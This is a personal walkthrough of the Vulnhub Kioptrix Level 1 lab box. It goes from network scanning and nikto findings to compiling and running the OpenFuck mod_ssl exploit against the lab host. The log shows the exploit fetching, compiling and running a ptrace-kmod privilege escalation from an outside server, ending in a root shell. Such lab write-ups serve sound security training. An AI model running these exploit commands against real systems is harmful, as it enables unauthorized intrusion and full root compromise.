Vulnhub: Kioptix Level 1

This is the first box in the Kioptix series from vulnhub. It is a beginner level box. Keep in mind that there are no flags on this machine. From this list: https://github.com/Ignitetechnologies/CTF-Difficulty

Scanning

Find the device on the network:

crazyeights@es-base:~$ nmap -PS 192.168.0.1-255

Nmap scan report for 192.168.0.202
Host is up (0.00098s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
111/tcp  open  rpcbind
139/tcp  open  netbios-ssn
443/tcp  open  https
1024/tcp open  kdm

Find details about running services, the only important details found were apache version, hostname

crazyeights@es-base:~$ nmap -A -p- 192.168.0.202
Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-04 10:13 EST
Nmap scan report for 192.168.0.202
Host is up (0.00060s latency).
Not shown: 65529 closed ports
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 2.9p2 (protocol 1.99)
80/tcp   open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
111/tcp  open  rpcbind     2 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp  open  ssl/https   Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
1024/tcp open  status      1 (RPC #100024)
|_nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)

Web:

Index Page:

Enumeration:

crazyeights@es-base:~$ dirb http://192.168.0.202

Found nothing

With nikto:

crazyeights@es-base:~$ nikto -h http://192.168.0.202
+ Server: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
[SNIP]
+ mod_ssl/2.8.4 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0082, OSVDB-756.
[SNIP]

The vulnerability must involve mod_ssl:

crazyeights@es-base:~$ searchsploit mod_ssl
---------------------------------------------- ---------------------------------
 Exploit Title                                |  Path
---------------------------------------------- ---------------------------------
Apache mod_ssl 2.0.x - Remote Denial of Servi | linux/dos/24590.txt
Apache mod_ssl 2.8.x - Off-by-One HTAccess Bu | multiple/dos/21575.txt
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuck.c' | unix/remote/21671.c
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2. | unix/remote/47080.c
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2. | unix/remote/764.c
Apache mod_ssl OpenSSL < 0.9.6d / < 0.9.7-bet | unix/remote/40347.txt
---------------------------------------------- ---------------------------------
Shellcodes: No Results
crazyeights@es-base:~$ 

  • Using 764.c - most recent i think
  • Couldn’t compile exploit
  • Found an article explaining how to compile the exploit on more recent OSs:
https://www.hypn.za.net/blog/2017/08/27/compiling-exploit-764-c-in-2017/

Make the changes it says in the article, and it will compile, and download ptrace-mod for privilege escalation after the exploit has successfully run (2021)

Compile the exploit:

crazyeights@es-base:~$ gcc -o 764 764.c -lcrypto

Exploit Usage:

: Usage: ./764 target box [port] [-c N]

  target - supported box eg: 0x00
  box - hostname or IP address
  port - port for ssl connection
  -c open N connections. (use range 40-50 if u dont know)

You have to select the OS, and apache version

There are two possiblilities:

0x6a - RedHat Linux 7.2 (apache-1.3.20-16)1
0x6b - RedHat Linux 7.2 (apache-1.3.20-16)2

This doesn’t work:

crazyeights@es-base:~$ ./764 0x6a 192.168.0.202 443 -c 40

This one works:

crazyeights@es-base:~$ ./764 0x6b 192.168.0.202 443 -c 40

*******************************************************************
* OpenFuck v3.0.32-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM    with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena  irc.brasnet.org                                     *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************

Connection... 40 of 40
Establishing SSL connection
cipher: 0x4043808c   ciphers: 0x80f8070
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
bash-2.05$ 
-exploits/ptrace-kmod.c; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; net/0304 
--11:58:50--  https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
           => `ptrace-kmod.c'
Connecting to dl.packetstormsecurity.net:443... connected!
HTTP request sent, awaiting response... 200 OK
Length: 3,921 [text/x-csrc]

    0K ...                                                   100% @   3.74 MB/s

11:58:50 (3.74 MB/s) - `ptrace-kmod.c' saved [3921/3921]

[+] Attached to 6283
[+] Signal caught
[+] Shellcode placed at 0x4001189d
[+] Now wait for suid shell...

Root:

We have a root shell:

id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

Looked for flags found none.

FIN. 🥳